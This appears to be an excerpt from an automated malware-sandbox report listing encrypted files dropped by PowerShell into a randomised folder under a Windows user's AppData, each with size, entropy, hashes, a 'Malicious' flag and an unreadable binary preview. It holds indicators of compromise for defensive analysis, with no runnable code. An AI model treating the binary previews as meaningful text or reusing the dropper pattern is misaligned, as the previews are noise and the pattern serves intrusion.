Preview:	r.t..E.I.@.s.$}.`K.I..O.3.v.Z..,..\|.f..$..S.5f....:.)^..D.M..m..c.Qfk...+$.1..w...Z...t[.S.d.....g}.fi........L ....5-......5...:[....7.U.........b...r..8Z...k.i.NW.&.2..H..9..}P...x..1.$l.zy.....I..0.}.)...!GM]..\..m..I.W.f."...{.4.Bm... c.$..^.79.U[..!s.{ZD..k..f.._>.....2.Io....k.dab..e.1_...xr..o.D...A.1..'c....-L."G...s.H..>.....tK...z..84....E..Mb..g..u..T4$.X.Z...7.sM?.2.....K_.....jL....j+>Y.c.5..?..c.C..[69~....8.x.D.y9...!..6....EA&..O...2...2.)Qh-...P7..J.H.....Q]..._.r.Bk...xr.....W.yV.....6.k..w....:.Z..<.q3.<.z...=.G..\v4$.?.?.....=/..fM+l.......9w]X...%l.....m....U=.a..:..x.....'.>'.{.jkKx_..n....9}.].l..c..2.Rvn..~..qv._vHk.,...!.6/.P...i....X\|.3.P.....w#..6...r@>.Z.%..WF.;.=Ng\I../-....2......=.....x....m..wP.Y..e.+.....-...l.../W...M.0.J}Q/.A.,\|W..f....^Gs.{.....Y..4\|...<.%_...5...l.e..g...]..?...#0.`..Y8.........).E.........C5...6.......:.C.?..$t^.....I.B..=..x\|........w..J.u...4...g..S#..?.!.Q.!..\O..\|-.`..R...v...!. .j..]...

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\UjrzbuFnoRIVTLSKXHA.zQGctwxhnarFR Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	187135
Entropy (8bit):	7.999058664353431
Encrypted:	true
SSDEEP:	3072:9NRTCiwzOOpdQSEYiJ5RHh2NOGjrMKWvkfx2/AZBLnPrOqoup6DHWlgFbbLET3Mo:9NRTCf6Op7iRB/G/MvaiyLjOqouUDMge
MD5:	1908816023FF5741FEEFB4C131597E66
SHA1:	B2073D18FBCB4715E330B6DF8CACC48951A34F65
SHA-256:	2BD05471D4DC5AA1A90DADA8C721359C0F3D7C22BAD23BF36CFCF3B55F360EBE
SHA-512:	A804277CF45F0C2912F19338288667CFCF40BE56A47057DF007E97C57F3E64444EF3B717324611BCFAE22999B2BA2D8D1133D8EE635889514C1050B6EC689DC1
Malicious:	true
Reputation:	unknown
Preview:	^....D.p..i..&..k...\|<....6.$.....,.C..^y8nz..E.1..jp.o...=...L..f...I.U0L.C.z,..r.:.\.@>f.].P..`.-.n..#.9$.+.Y..,....h.~...h\|...Wm..._...."n..oi..a.x..MX..6a.:.(.......F..Ef.#..@E.}.x...rw\..E.?.....2.4..P.D..V..U...2B.... .E=G....Yp..9_3d.5b....QBc>$N.... ..`..\A.!.:....[Q...Y?.a5".2/.6DV...4J.}uH!..(.....p#.P bSk.y..e.....&.}~....^.X.~...!.:....fn.b...X..}..?...^0..Z......XE(.y6..^P..w....\|.....U[....8...[DU..nC..0.d..X^..RY...a.....u.n.3.Q.]q.G.......(M...[.u....38X.....f......R..8.(sd.{DPO....x.......y.f.#/&.T.....Qz.G..uW.{..._KBu....+,.w.f.n-....H........N.\...O...d...r].......I.ra.l3*....qG...E!}-...q.F...=..U...M:.v&....g........C..L..Q!}.P..........vR..:?..-.....k$.=...5.....@.2.yh..>....k.>7..YQ_N...(.....Z.?.I...g.@.d&.....bq.v+].>..(.B$....!.%.....G+..v..\|8wy...MD..?...\|.;..z.j.......e`...p.A.gE.(......k...J......}...7..~..^4.AUJx.m Q=.].'...9...Xe.._.....5....99..6\6......)j...l..O}.3x}diN........l"..KS.^z..~.....w.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\UoRzTebkDwpOsaflhW.RyQzHhgvZNoXfaUe Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	174615
Entropy (8bit):	7.999021410626924
Encrypted:	true
SSDEEP:	3072:Ilfoz7Rq72Z3mJDtMQlywWG4pv2qfFgb5xgWhYoABCfJJueBTC3l4qvap:afs73mJDWQcwApvXGyWhYrCJrC62ap
MD5:	6DBC45DFB3EEDA1AC6325356326DBB9C
SHA1:	89FC6B4B7B4620A97D9E625EB0D040381F86CD24
SHA-256:	FCB33C50EE40F8583C1BF13CA2239481954C036D9016900A7F5EA6D8A89BFD61
SHA-512:	3EF1E362D3536C731BD44E76C58C36F8FD7C2B0647B547BFBCC31A10D82361A0EDC088BA40C337139C5FE28051F72856EE097DE8F753A18A92C27F426F825C8B
Malicious:	true
Reputation:	unknown
Preview:	.[. ..BJ.6.......~9.h..&x...]..B...ic.UK.L..5.......u....@2al(..7o@\...S.B.a..\|.[.\..o.G#.B#0.x?.5v].b.g.YHh...&Q..\.AZ..w/..`!..UXw......RF.v.....H4.C.D8..........Q:...{mw..A..eGN.R..[KF...x..8.wb..r...,m..O.EI...~.~.MO....?.W.o_.M.M.>...T7H.X.........#...--...A.9.......o.q.e..u.....3x.6.......o..!."..[.!.......)..r_0.=\|hg.Tl...TG}.&..W....;....g<..brv..i..[$f.w..\|...8.~n,..4..Yx...v.4....kX...2tS....R..........x5]...}..&.h...J.....~.n...._Jy...?....=...8]...ty;L.#..^>.A..T.m....T.Q).,....N..i..-.......V..J.....V..."s....-.ooTn.?.........\..<{..J$%.^.W~.m..C{.....]`..O...T..4...I.4X$.z......q...g.....M.b{.R.r..U.....c.....B .y..?P^3`..nb..Y..I..W.a8...VQ...=..B...I}..yo...B.!.B..&.C....?.D....7..J'.)....z.?...=..8v.,..]...\|r...tM.\.......{..N.....D.Z.m...&...V...!....K.o.}...../M...^N...]m)....}.w>....O...2]...}Q.......tE..>.w.E.......3..+.ql.M_......!{....H.~r......_..d._.....C.}p /.6...p....a.>.O...^..p/.......}{......Q.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\VDsefFSmIJH.gNhpnMYTiyZ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	189657
Entropy (8bit):	7.99902303935466
Encrypted:	true
SSDEEP:	3072:A6VRmHiBu28QB2G8TCUQa7bgY9OQxsk33PL9pbW8rsowwc6+92y4GTlhEFbcN1S+:dmH4uK2+SfOQqk33P/xw7eGxhx1S+
MD5:	EBB15645D79FF0C1419A89C8A8DDAF1D
SHA1:	47EDD39A4EE4A5B59DB5E019A2711072FB3708C3
SHA-256:	C9AFD034E714D8690181BB98C0902AA5D3D53D18C792AE8F467A0788031AD68D
SHA-512:	83B424C70709EE142DBAEDB8C7F7680D11450900045140BE0202D8D287E6ECAA007FFE2AAC1467F8E4C100FDBCA0403B839272FA63536559B17B8F446C83546A
Malicious:	true
Reputation:	unknown
Preview:	`.Yj_..\|...YvZ.(....<.d:....{.!..(d....SS...N.........#r.0.y.m>..1".,/...._.......I...9j.m.@p.......?QW..ED.....1-0..N...N..J..<J....Yo..%..t3Y.]..r....\9.F${..9(.}U.R.0...l....=.(.I.(.x,4T..1..r..,Aigo..R..w....o......Tp..........N.=...i.Q[...T.e. ...k.:...f..o.!.Y....;3...}.....UVe..G..N}VG..h}..a..>..x..?...1r..,QSvD.l,..bU..,r[....(.l..%....P...].............c... .l.........E...B...u.f., ...l/...'.wJ.fU9.7..n.P..)UBc=YWom...)Wx0N.......<2/.X..8..0... ./..N... $45.48.'.)....%..QH...~j..f..`P....i.....l.tn.t.l.,.W.e4...n..8..`)-...~P.M...XQ..S3...,z.7.c%.45..cJ......W.%..{.C:.v......yR.+...n8....i...Q.U.gCE..O...M..q.....K=...``{^eUe.\....I....sG..1.P..........a.oGe.._....30Q"@^v.......Q8@S..2.....SM....:...w.{..SOSw.t.Jl.ew..<v..@.(..v.MM.w.....fU....!x1(p..d.:..c.q.&............K%.rD..H......-C..e./v.b..S..x.0...\...2.R.J}P1....Tz.8..u....Q.P..o.b..0..z.4G.%j.?@.$...........pt.q#.YJ.z.e.RV.....I.n.O.....4.Z..A.F......D.....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\VHghDoceFsG.HNhPgvIKEpoOYR Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	166533
Entropy (8bit):	7.998922768931377
Encrypted:	true
SSDEEP:	3072:POsQPV4Bd8EUuAVuYe9r1p/VBnrhs50oOStnjZNkFPB9sm5MzCDu5DIIhAiXFXo6:WL0u+AVuYe9r1p/VVoZ0FPBN/DOIIhAq
MD5:	701839C584EDDDD1DFE829C2084A8BC0
SHA1:	F9B71A86237611EEDA8F99E03E423F57678278E3
SHA-256:	11C1F870E2B747CE715006D1091D4420C26C000646436A32331C6B4A307312A7
SHA-512:	B3445FF25F62C43B200FDB9A66EACBD6B277AAFA304E2E643553E907375A3A1F83636DB89094CD07CDD31ACF17F1D9DC798F7E632E1AC5E22F6C94A120161BF5
Malicious:	true
Reputation:	unknown
Preview:	V..5q.D.8.&.Y6....,K'j...p...$#.v.....\|]Jx.rk...(b/..b... ....l.w........8.m&.....2.n..I....b>1..e.g\...~r...Z!.N.].....=T.X?..J..T...x.G.wH.P..c.........vS3...`...y...~.\|.1..+. 0q9...N`.....,p....;........o.............z..jW..0.......y.g..Iu..`...k..5.U'p_u5w.>.D.....,fiu~..........9..Z.G2$8....N.,Oa.....#\.ks..z....8.m..4E<s.W.....cp .,...b.dD..*.v~l.q.\..d..).h4Y..q..i.o..u....-yD......v\j'.8,V/.z....wr.....k...$...O..wU....h.tgyx.E.E... ..z.JV7..{..........cH.bo[.t...JV.......i..c.J......?....@.;..`...#Z....d..s.....F_..M.....-.Oe......&....5.....4J.k65..E...i...^c}9.pt..%3.8......[.x.u..9~\t....8:.1..".A.~....>.L7lG.....6.].P<..zr.k..9e7...H.....K?MO.Og.,T..A)[vzlaD`2.g....c?..\|.q,"...3..u......ED_.]..6B........JW.F.,%.=.._c.L.......:...~C....-D.....2.\B..r.}.Vv.....l....(1...z...5.x.V..t5RF@o........g..S.....MO.%.v..._{.....n.!e....E...hq... M}~.;..Z0....A...rX.....1..F...Y..vl...rY.n._...M/6.U.s..c&.......!...

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\VeXOCEPIgcrnAlpmS.NrgdtJZyUaeqYAIO Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	80256
Entropy (8bit):	7.997936515563757
Encrypted:	true
SSDEEP:	1536:7CyN6nOJdxq0IGecDthDBADdNCQ2jnDdSqt2D1E3/k2iOh:7mnOZecDtMqrk4p/vi+
MD5:	E475AB30B688EE5D2FC2B6CBB1512105
SHA1:	A5D85B3AA5C200D653C9E1446F2B125D0B368372
SHA-256:	606F664F2E777F773E4E020F71065AEB9413904809C92AA01A2185F32DAD8C67
SHA-512:	2F684610DE8335D2910B695B8C77D850F78EE62BBE065D49306251F71DA93E0148F64205F890DEC5866657218384D626EF126837CA38BDE022A8D5D48880B051
Malicious:	true
Reputation:	unknown
Preview:	..:l?.tc...z...uP)tU~.'Mc..\|...w....../,.w..Dw.;....do.a.....{..G....._E).!....A...r_.K..346.;V..d&.\..;.?>......0.....E.....X~...5.J.7.....#~u.a.p..\.._.F.OX.k..........+...v!.....{..v...cy......x2...z....u.6]~.....:....r.GR.8..X...M.!.%..........p....VG<.. }.%..#XV].W.).Lv.`...$C..........<..F..._...m,1..R{....)6Q._..DVi.ev.G.v..........6.'#....b.x..x..B.7g.....[C...s../Fe..6Hl3...L.c.X..."2...o.......j....P0^....M..I..y.h...A.wB.N.sS..Z..G;...v..Kx.l.....\...'...I.j.5...E.=].......R%HCZ....o..b..@.W..cF....c.........J.....S....C......\|.+./...[....J?.F.j.MU.c..&.WgN.>.)w.....T.&.Q.p..e...&..~x..M.J. .~..h..\jF....@.i.v...V.j....n...O=........[...N...F(...%.W....eR.R{...8..C..C....3^1.o.b..r..'Pg4c..3..ST_\|8..B..s.3\9F.d.6.b...I..vLR..L......0...4.W..Er..DD...`..t....3..Z..3g..5l..2.A,..g(..\|d$E?.L....M%..D.....c....H2.-$.0..(n..`b..(.l...]..%.....{ .;Y.#.4...J.~$......b.Txc..w6.....I...Q...n3c`h{{?...:..W.....ra.......3..^./.A...\..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\WDZBQvdYspbNUcGaL.sJStYkmKzTH Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	114980
Entropy (8bit):	7.998432779454536
Encrypted:	true
SSDEEP:	3072:USRQuNT+0SqlWTYorqBUInbaS+akS6cE+8CFM3soXhGz4Or7zn:USv9ScKYmza6c58t3NGzdnj
MD5:	3364BF2DBEF5E1A0B5646553F575E287
SHA1:	061AAB2FF1A9CE43D8A59C028426B8E4F1A2636E
SHA-256:	16ABC049B7E16D6B8DAFDB8CAF68F0F33037B00B52F236968EFB27ED4084DD3A
SHA-512:	8AF1FFC3797F947332234CD1006CDE0F5E26E4867FC4CE2D9E0B81703BEAA5FE52768AC8F8E6384E96FB7C398319A8793A6418531377EC2AEA7C6E85FDB28692
Malicious:	true
Reputation:	unknown
Preview:	e[.3_.\....m.C..3.;^l.=D..4..E.}d..m>.q......?......r.....sZN.;A#}..7.. 1?F..QP...QFI...2N....B...v6/[/..V2c0#.W.q.....qN..:-.... ..I.D.rh..W...>...<...../W..^;._..D~..hgw...D....u.....a.....8...<....'..k..a;......}..H-{....`...\|....Y\|.hq..o.~.^........r....Px...>..4..A..L..<6.\|[.........].O..l....\|..3+.v..O...{.w0.M.\.U=.HC....mB3...)...1{...#<.....N0t2..f?Og9n.{.$~?[#..W L6..CNP..g.R...;.t..Yl&u...j4hp....fE....D..o+4.X.@K.k...6n.:i.j.@DRd..[...X?.....'%}.....0...\|...6.....r..V.(..E..q..6..]:C.-......5.'.C.A..e.=6.R~..X.>4"./.R`....V.np}Y..C......n.>=...v.P.....[..'P..@7b.u..)J......k,E..$.g...d..=..d..[.....a..S.-.Xv..o\{..........<o....d[....LH..U.Jh.[...L...Ee...@rx..o.za..gE....."..g9..C.{..\=.1.~..c.c..0@...[E.m.5.8...#p.\...c...N)2..pr.=..o.....F.D..?p.m...f).PdD.5..b.e.l.<.....U.........J^...D. .}.3Z............3.S......m(.P...\|3....H.4o...}nXV"b..6?A..L.<....$.!..L}...'....K.}..F..+.d.....Y.6.`.;=m...;.M..[r...P~.....m.E4...h

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\WEajqSMsRYDbmCrAXw.JkaRbmrHzUn Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	151565
Entropy (8bit):	7.998984444990453
Encrypted:	true
SSDEEP:	3072:M4WuMDjz4qriJ7ohmDuAhpr/cEoufW22DZ6nbncRI7Xc/hTxkjz06hghJ9xPJU:MIMDf4qriJ7e1AhprUEHm6TSDCuhrnU
MD5:	D85D2979AE3A891457A9C9806961C716
SHA1:	470287347F442EFB97FD32E640A8F457B5FD7102
SHA-256:	11BC978D410D29E6D9AC67E625850791767C3B7DC9E6FC314D405A9F2C81B320
SHA-512:	A1FF462AB06B68E819BEBCCCB1E3C42C971569268D3A611AE67FFF242B056A79F534AF95DED3266AA9CD73BACC7A55C75BA9E4942DBB1AE664E5043CBC56DF7C
Malicious:	true
Reputation:	unknown
Preview:	i.2...'I1L.....w4...l.>~..L...=s.]..,hXR...Mf.D1.......K...^.c.S..J...=...x.`U\ .DK.XH...v.H\2...N...^.Z+.-...zYG>....Di2.^.W7rR.....u.P.....J.....\q.p.).S....g..>g.. .y...N.dg..6T...+....P...@.n.......rSD...h6......^..U5Y..........U...........[...6........i..._...nb;.?^x~....m.Q..}.....I...Z.G..&j...0#..........Gz.+jN.....a..F..%)\|Z...@.X.F.N6N.t>3j..s.br...D?.Z....+)y.<...N...`..~..._......j...a......^...#a0.q.[.&.....t..(..1..moNMu.a.3!.iR.4.....[..t.Li5...~..8#....0..4".~.@.O!...Z....M....y...=)....F.?sN.c.0]@....S..A..I......@c.LG.k1..-...82V.."...GD_..3g.`...f'X. .".E..p.,P}..q.A......s.....5c..2.2T.:ZJ;W..j.h.O.}.$.OH{.'..-..7.?f..>iF.j...i$...u.G.....l.<..H..Z..p.._...4.~~3.v&.$.<V.F\a..#.gM.B...j............"....'RO?..W.kk;`.q....@_.........R%....GJ....H#.52.f[...]%......I...K...AO.'.GJ..T..:(.zI..A....Q.qx.n........N.bKE\|!L...V.........i..w........1..lP+l.V...t.....\|=........7x.bY..[.k..2........V.wy29.Kg=.ak.FY...X......?y.]

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\WSGDbaMFPOyCV.DhmVRCWPwZnbcpqOB Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	97143
Entropy (8bit):	7.998112133836548
Encrypted:	true
SSDEEP:	1536:OyKts1z9psIf0QK8aOY5nY7JacdQTffjPIrO7bU+MneN3AcT54oeWFY8rkFfN9LX:7KtIJmIf0+aOYpBTXT8Orp51XrkFfJig
MD5:	AE70432D2F183407755400867FDC13D6
SHA1:	01937BD80B230450CCDEC8B8C284D6A31E2F47E4
SHA-256:	B50926EEE0A8765A6F8B2F3208409D59CACC8F85D6FBDC02B637824F6EA12210
SHA-512:	6B323132DAB911F1D103AC79C18E2D8691E22CB2A105143A5658C9890E254C063716FA595978AF4BD0968D03413050C5D2A763758B3AE1BDD2CB9B5CEEBD42B4
Malicious:	true
Reputation:	unknown
Preview:	..;u].?lG...E....x.E..V.}.....l.[...S}.u'.d.g.. ~I......JX{5....S.Z-%].W.E...4g.}..X.....S.n._.=.P$.........}.c.......[i..^Q......X....H.g@.R..........e..sh.S........T'?.?.M..K.J-=@.._.T.a...^.H6.x.{V.v.k..lI'......P....._.+.M.\|nb=...v.P{.}9R0..-........+?....:....)Z......!. M.e.=....Jj.I..'.......s...-.q...P6S.g4..L...T.^..0R....!D.S..M..z-."...5{".}[!%A.....t#,\|;..qcM...S......c;........cv.`..n....W.xC.3.y..j8...."......~6.G.0.K..G..q.dl"..4..z..Fn...m.d.%..t.P..=...r...+..R.{........>.>J..>d<..0..=.B`.<I.QK.M..dd.i^\|.f...J.V.......K.o.M..V:w..X..mX.b~..[:........T...s ....~g...N[84..}or.K.KeI.?.....;A...P.....a.LG\|#].(0.um.s'.'....E^...=...q.mP.?....R..I.)....d.s....J......4v..p.....l.._*.....j3.'....G..~fz..qs;....-T8...(....i..%.`.r=+...Z.n\.P9H{.b...;..K......v;Z..J4..\|>q.m..x...E..Q)...E.......9.Y.).G(...!.W..x8!......7^...A/`:l...m...].F.D...us...>....t.w......m.N...../..y...Ai-.j.{$Y.V...}.'...T/......6.....\.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\XGDnpNlmCvqQaOMLt.lJXIxpTOqNMjw Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	100826
Entropy (8bit):	7.997921632795639
Encrypted:	true
SSDEEP:	3072:/WBWEDVuJc+xCDN2GKA9EbpOvJK4ewqg4W2zgoNJ:OrDUJd8EGJ9pRKJg0gof
MD5:	45E801F25E37C247C56ACBFE551BC433
SHA1:	D93562A8D1162B62A2C364FA29929E24E751A535
SHA-256:	F34BF96C70901A9D26254DD78738B921F6EC86DC9A47762D50697D2B27B30158
SHA-512:	1180E0B97FCA3F573643AB40AA3DB4C5EA7734B88917AEC745BD0713DEC6976A9E98B47C7F4DA9366A7E4C03EC6D95B84DDA6E0FE50A537DE00DE36ACD60EC6D
Malicious:	true
Reputation:	unknown
Preview:	d]..m.L..;../..T.>1.F._.h..c..oy..f.x6X...:.....;{....-.4_.....0f."..h.'1Z`...p:pc?..........%..d...`.....bj....w..<m..~9/g..3q:.K9X...,.4..@`.j.E.JO.X....0..p.Q'xm\......9.0=.<...&.^.:.....mx...t..............=.z.\.&.($vP.$..l..xCs.M....U+.M...:..k.~..3..=......<..3.V.J.kI"..T...........B..&e...7.(.^..e..m.. 4.{I..+IC;...f.E.L.x.....P.?..%`.z.,..B...W....LQ!...C.;...:;..)U..\.9.l..t.X.s...+...9xmI.w....F..L..)..I;%LGxw....c.."..Mn.U.F.jv.j...O7..S ...$...>.....[.4..w......_..kG#9...n..!uw.`...Q%.g..t.$.Y..C.8..o.5..0Vh....p........!i...(.M..Y"...T.{0.l.....4.153..Md3...x...INe...k..\.\G....W\J`C...}t.C...nJ>.........3U...'.2..."j....v.....E....H.V...K.....P<p\.@.h.~-$h.>.$.kU.wQ..D..Z2..}.(......+.c....\|......L.j.%8L.R.!........Kg>.F...o..a..L8.1...E....w.D~.Y...#.uZ..P.F.D...Z.Gl!-.in.g....G><h..1.g.o.......v..e...6...B..^g.z.....i.lm.e..\|.m>=.\..WS>.%,.8..C.{.....t....J...9.....u..{.@...%d....5.j.s..`k..v.%.......4.L...-..Wup.6./.#.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\XPdZORVTUyhqJEgwj.wFBdSbZJhgcKV Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	66161
Entropy (8bit):	7.997290727551411
Encrypted:	true
SSDEEP:	1536:opofioPXVOrFsrCqv0hO+8QMasI8d/qhgKzAfzYikr5QoIP9:4KiSwjjOh5IcChB0+tQoIV
MD5:	FDD9FF3BABC06A2FD12DF26AFB8221B2
SHA1:	6D0FEB4C634BA6995E6593FBB387B9C38F73AE0B
SHA-256:	70C913F5A3B8B18776AB80222BE669FD2E6C47D09D9A8C34232CC8F2776D1088
SHA-512:	B5E00B8F934B45D02776169264D555A2CFF727A55FB0754ADF6893616DC7C3FDBC034A8EF4B61DAC6E3B5B31408970084BB15184C28FA36E47C515AA837018D8
Malicious:	true
Reputation:	unknown
Preview:	a.../..S.7.i:..%.....oGF;..:1.....p.=.X.}~.=?.7...sB.S.W.....u.a.. b.G#.g...IT.n..t.......?..\|M.Pe...P{.a.....4.3....P.....m.LIC....,JD.o./&...).@H..Wb.......w.u.......G ..^........>l..WD..S..B$.`....c._...p...$I<.\\|..3..):.........pF..U}q.w..8...<H.......%kBy.....O...}&..L.}&....F...y;Yi..;...."......o.L.`.#.1d........J.;K.R.b...9.8..f....5.3..T...}.X....$E....?..^l.,..#...,.A..7v.fw..t.BI....W..5.ulp....y.3.w...4.../.`...y../....v..9....`.....}S.Y.\...B..%...W...H.-.V2!...5...W-4.&N.`U.%..........%...;o....g..~..}..i.W...S.#.C9....i.3Lc..p8YD..Q^....d.!.....K...gSVi..'...Y.Q$.....L..?.Z.d..%.e..........a....l..Mu.}.x......OZ.]p.5..B..o...n.s.x.....\|..('.....?.=.U..3.l...#U)j'.A.JV.=L...B.....\|.C...h.;.....^.....Gs.M..g^.`.uk...V....0....2F.&..4M:3...O.3hWgP..R.......p=..+r....x[.#1).Y8v.Y./:...5..b.K.}#.....XN/..1+US....S.~.p.\|..F_.bc5(........;u.Q0Q.f.)3..k.9.....~..,q%.A:}...5.r......9..8.di.U....%.+.$]...6....Fs...8...L' .'x._Z..[m....H.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\XkpsiyquBfQOJomWVSb.TQoVmyrCziLJjv Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	186492
Entropy (8bit):	7.998987987878927
Encrypted:	true
SSDEEP:	3072:PrAIZUhPWRiXgQhVyQ7x2VtbxyjiLnHFJwi+PlMGnie88f:zHUhPqiQQ/gbxy2Fx+PFi7u
MD5:	F560B753CB10A67F07AA93977F6D5A2D
SHA1:	2061B754EF6899D9C546200009890625F6CB0FE9
SHA-256:	0B8651F1E3F417A99D3A0282A56E39F0DA44A35EA44D159B5D685FDE81230047
SHA-512:	E1067530B0A2A11F9E9AD1991D2FCCB9F6C917E106B19274CC6D5524056E4E08B1671804A8C5DA59F748B77233678ACC50A8888703C6D710965DA7DE09A3C8C7
Malicious:	true
Reputation:	unknown
Preview:	^3}4h.P....JE....Q..\..).....tP.Z....f.......<......_Sk..Tx.!....$F..._<?8s..&iD.[..<[.Zi....y!..m. J...D'....3........g.wM.P.QC...N...P[.jz.>.'s8.&.?....a:<L.h.d.@....ZR\|'q...%!..o. D....."..\.{8.V..y....~..[c.....hFDY$.I.@.......l...-..F..g..j...2.,...>)..LK...a...:I`.}..Gu..3.m.1..>N..M+Z=h."....o.H....c...4.<..]..Lu..".y.Rx.e-.....}W.%,]C%`,.X..K+#t42.[m.v.@...c.....&H...]M.......d..."..........P.!X.,~... [{<+h....x.@.wI....p.$[...85..#.3..X.{...........".....o]'..w.w.C....`...0_..WVOS..,.a.!.S..`.ahqBZ>"K..a..pVC.o.#..KZ.......q.......1.?I`b..v..D<...._}..?....s...t..Z........ V5D6...}Y.L.....=... .I]m...d.t..pXt=....=D?.._...!.......vr..x:._.)\|.....)o...5.4UHR.i..m.t../....q.6/x.I...9..,A...0...a...:7.K...+\.....j6...G\...".{.. p...k...G..+......BD.R./......m..P....~Gv..5.C6....-.1`f\{..Pbx.w..`. ....g.....c.s.K?...M.....@9.5^.c.+.i...Sb{{J...l7..q..S]..SY.;.6.]......(D....g%y..Adp..Pv.umz&.E.2j@.a..H..MMm.......(.g.K`E....U..5.9.$3"..5.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\XrFMbICTPLQJwB.uqXUPEjfvS Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	65237
Entropy (8bit):	7.99732238442183
Encrypted:	true
SSDEEP:	1536:AyjKebtt4qrY+4ALFDTyIJ8QB2c/iHPlFibXhUQAF7SJwaYsfY9l:A6VRmHiBu28QB2G8TCUQa7bgY9l
MD5:	FF212CD00158EFE6247B384FE41D448F
SHA1:	87A9DA34D59B2DDF6089C52F501B4CE41864B69A
SHA-256:	8D80E2B85D6A23179C42818ED43B0A4E9026EB2C5D5842C795C7758C7987A8B4
SHA-512:	7128D8CA080AC870BB1F75E298061A53752529E6D093ABBC7D86E818451E37B8384D6412BA01F5F5A27E2525A076123F152C67B7EFDEFA75779B2C28BC682AC5
Malicious:	true
Reputation:	unknown
Preview:	`.Yj_..\|...YvZ.(....<.d:....{.!..(d....SS...N.........#r.0.y.m>..1".,/...._.......I...9j.m.@p.......?QW..ED.....1-0..N...N..J..<J....Yo..%..t3Y.]..r....\9.F${..9(.}U.R.0...l....=.(.I.(.x,4T..1..r..,Aigo..R..w....o......Tp..........N.=...i.Q[...T.e. ...k.:...f..o.!.Y....;3...}.....UVe..G..N}VG..h}..a..>..x..?...1r..,QSvD.l,..bU..,r[....(.l..%....P...].............c... .l.........E...B...u.f., ...l/...'.wJ.fU9.7..n.P..)UBc=YWom...)Wx0N.......<2/.X..8..0... ./..N... $45.48.'.)....%..QH...~j..f..`P....i.....l.tn.t.l.,.W.e4...n..8..`)-...~P.M...XQ..S3...,z.7.c%.45..cJ......W.%..{.C:.v......yR.+...n8....i...Q.U.gCE..O...M..q.....K=...``{^eUe.\....I....sG..1.P..........a.oGe.._....30Q"@^v.......Q8@S..2.....SM....:...w.{..SOSw.t.Jl.ew..<v..@.(..v.MM.w.....fU....!x1(p..d.:..c.q.&............K%.rD..H......-C..e./v.b..S..x.0...\...2.R.J}P1....Tz.8..u....Q.P..o.b..0..z.4G.%j.?@.$...........pt.q#.YJ.z.e.RV.....I.n.O.....4.Z..A.F......D.....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\YSJRqueKrWDMXcf.mpNueMrxSL Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	170480
Entropy (8bit):	7.998682537032857
Encrypted:	true
SSDEEP:	3072:fIPJF3KLP+oC+zD6IkJSnrqVbCKE+sguFf/MoWgdeOEC6xpJON1d1:fIB796Dbdn+oKE5pMoreVLON1d1
MD5:	78F79B8937B1112ED9EF5765110445D7
SHA1:	4CDE3601F6763866BC34329667CEE095A8435720
SHA-256:	654621ECC092958DE42A3093C704EE4D2C259FD62B06859C8D52A01F0AAE5E32
SHA-512:	9ED5BC41FECD9D54988AAED99063BD951DF15D4B4F9A92EC5AE2471ECF455283E5E9D5E21EECEC3C127AC53B36DF0CC5AFAD6030C04026A060C754DF708FD181
Malicious:	true
Reputation:	unknown
Preview:	o....Tz/....t.v ...Op..S&..yG%..............6)-..O......el...l..b...D.\&ui......_.b!.e...1.>L#6..D.4r..E.7.cM.g.rV.........1..Q3...6 ....b-..p.R...]w.h.....'..bIV.1..i...z...zm....#pm.9e..G.j..!.Mcq..........a..2C..R...i.Zj`}...!d.o.t.bXi.......].._z^J.pHl....'@'...O0.yKC.G.y._....L$.....[. ....#............1=.Nq~>..:J...2b..[.V.Q....g%.7.0{.m..&..... 